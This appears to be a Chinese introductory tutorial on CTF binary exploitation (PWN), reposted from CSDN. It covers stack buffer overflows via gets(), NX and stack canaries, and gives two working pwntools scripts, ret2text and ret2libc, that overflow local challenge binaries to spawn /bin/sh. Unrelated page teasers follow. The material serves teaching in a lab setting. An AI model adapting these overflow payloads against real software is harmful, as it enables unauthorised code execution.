PWN

PWN的基础

一、PWN的由来

CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWN。

PWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:"You just got pwned!")。有一个非常著名的国际赛事叫做Pwn2Own,相信你现在已经能够理解这个名字的含义了,即通过打败对手来达到拥有的目的。

CTF中PWN题型通常会直接给定一个已经编译好的二进制程序(Windows下的EXE或者Linux下的ELF文件等),然后参赛选手通过对二进制程 序进行逆向分析和调试来找到利用漏洞,并编写利用代码,通过远程代码执行来达到溢出攻击的效果,最终拿到目标机器的shell夺取flag。

二、Linux管道

Linux管道可以将一个进程的标准输出作为另一个进程的标准输入,管道的操作符号为“|”,比如ls命令可用于查看当前目录下的文件列表,而grep命 令可用于匹配特定的字符,因此ls | grep test命令可用于列出当前目录下文件名包含test的文件。

三、Python基础

在Linux shell中执行python -c "print 'Hello'"可以执行双引号中的Python语句,即通过print打印出Hello字符串。Python中单引号和双引号没有区别,因为这里使用双 引号修饰Python语句,因此使用单引号修饰字符串。

四、gdb调试器

gdb是Linux下常用的一款命令行调试器,拥有十分强大的调试功能。本文中需要用到的gdb命令如下:

image

五、汇编基础

读懂常见的汇编指令是CTF竞赛中PWN解题的基本要求:

image

汇编语言中,esp寄存器用于指示当前函数栈帧的栈顶的位置,函数中局部变量都存储在栈空间中,栈的生长方向是向下的(即从高地址往低地址方向生长)。

缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,使得溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超 过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。


PWN的入门

一、学pwn需要哪些知识呢?

漏洞一般是1、gets函数这种对输入没有限制导致溢出。2、格式化字符串漏洞。3、数据类型转换的时候产生了溢出。 总的来说就是对输入的值限制的不够让用户的输入影响了执行流。 那么如何利用漏洞呢? 在linux中有一个system函数system("/bin/bash")这条语句就可以调出shell。让程序执行这个函数就能实现对shell的调用了_

二、需要注意什么

在溢出是要清楚2个问题:1、哪里有漏洞,也就是我们能把自己的代码或者字符放到函数里并影响执行。2、我们要让它执行什么。

三、简单的pwn

```
nt __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(&s);
  printf("Maybe I will tell you next time !");
  return 0;
}
```
这里需要安装pwntools[这里可以安装工具](https://blog.csdn.net/gyhgx/article/details/53439417)
```
from pwn import *
payload='A'*112+p32(0x0804863a)
p=process("./ret2text")
p.recvline()
p.sendline(payload)
p.interactive()
```
112临时变量|addr(s)-ebp|+4 0x0804863a这个地址处是
```
.text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"
.text:08048641                 call    _system
```

四、系统保护机制

当然系统也是有很多保护机制的

checksec工具可以帮助我们查看程序开启的保护。

下面是checksec的执行结果


root@kali:~/桌面# checksec ret2text

[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.

[*] '/root/\xe6\xa1\x8c\xe9\x9d\xa2/ret2text'

    Arch:    i386-32-little

    RELRO:    Partial RELRO

    Stack:    No canary found

    NX:      NX enabled

    PIE:      No PIE (0x8048000)

现在我接触的2个一个是NX和stack。NX保护是站内代码不可执行。stack是在栈里面放一个canary值这个值一旦被修改就会触发check_failed()函数,打印程序名然后退出。

NX保护:

你不能执行我就不执行,栈里面的内容只负责把程序执行流引入到一个需要的汇编代码的位置处,然后调用程序自己的一些代码来实现攻击。你可以调用含有call或者ret代码这样就能一直连接下去。这就是大佬说的ROP链。

cannary:

函数在执行的时候把一个值放入到栈内的某个位置,我们想要溢出返回地址就要改变这个值,返回的时候系统检查canary值是否改变,如果改变就调用check_failed()函数,打印程序名然后退出。基于这个原理我们可以1、找到canary的值然后填进去。2、可以覆盖掉check_\failed()的调用地址换成system()

如果system和”/bin/bash”没有放在一起怎么办

这是ida反编译结果。


int __cdecl main(int argc, const char **argv, const char **envp)

{

  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);

  setvbuf(_bss_start, 0, 1, 0);

  puts("RET2LIBC >_<");

  gets(&s);

  return 0;

}

和之前唯一不同的是system和字符串“/bin/bash”分开了

下面是脚本


from pwn import *

elf=ELF('ret2libc1')

payload='A'*112+p32(elf.plt['system'])+'aaaa'+p32(0x8049720)

p=process("./ret2libc1")

p.recvline()

p.sendline(payload)

p.interactive()

关注一下payload plt是elf加载动态库用的 ,里面是个地址,存放着一个jmp xxx xxx就是system的地址。’aaaa’是system的返回地址,不需要返回了所以这个值没用,p32(0x8049720)是‘/bin/bash’的地址。需要注意的是上一个例子是只需要传进去参数就行,这里进入system的是ret不仅需要我们布置‘/bin/bash’还需要布置返回地址。


作者:九层台

来源:CSDN

原文:https://blog.csdn.net/qq_38204481/article/details/80099622

版权声明:本文为博主原创文章,转载请附上博文链接!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 200,176评论 5 469
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,190评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 147,232评论 0 332
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,953评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,879评论 5 360
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,177评论 1 277
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,626评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,295评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,436评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,365评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,414评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,096评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,685评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,771评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,987评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,438评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,032评论 2 341

推荐阅读更多精彩内容

  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,352评论 0 5
  • 似乎孩子们生来就和妈妈亲昵,成长的那些年里,和爸爸的对话是三句话不离一句“我妈呢”。孩子虽然依赖妈妈,妈妈也总会有...
    05c39a4edce1阅读 948评论 0 0
  • 无论多么舍不得,我都对自己说放手。喜欢和爱最大的区别就是 占有和付出。我不能肆无忌惮的去霸占,因为想看到你开心...
    影子人阅读 247评论 0 0
  • 21日早晨十点过驱车回家,途中看到洛带古镇的旅游标牌。离家已经很近了,于是下高速去逛逛。洛带古镇的名声很大,...
    山神山神阅读 430评论 0 1
  • 制作mac 系统安装盘 第一步 AppStore 下载软件Mac appstore 下载镜像 第二步 准备一...
    gianna1030阅读 275评论 0 0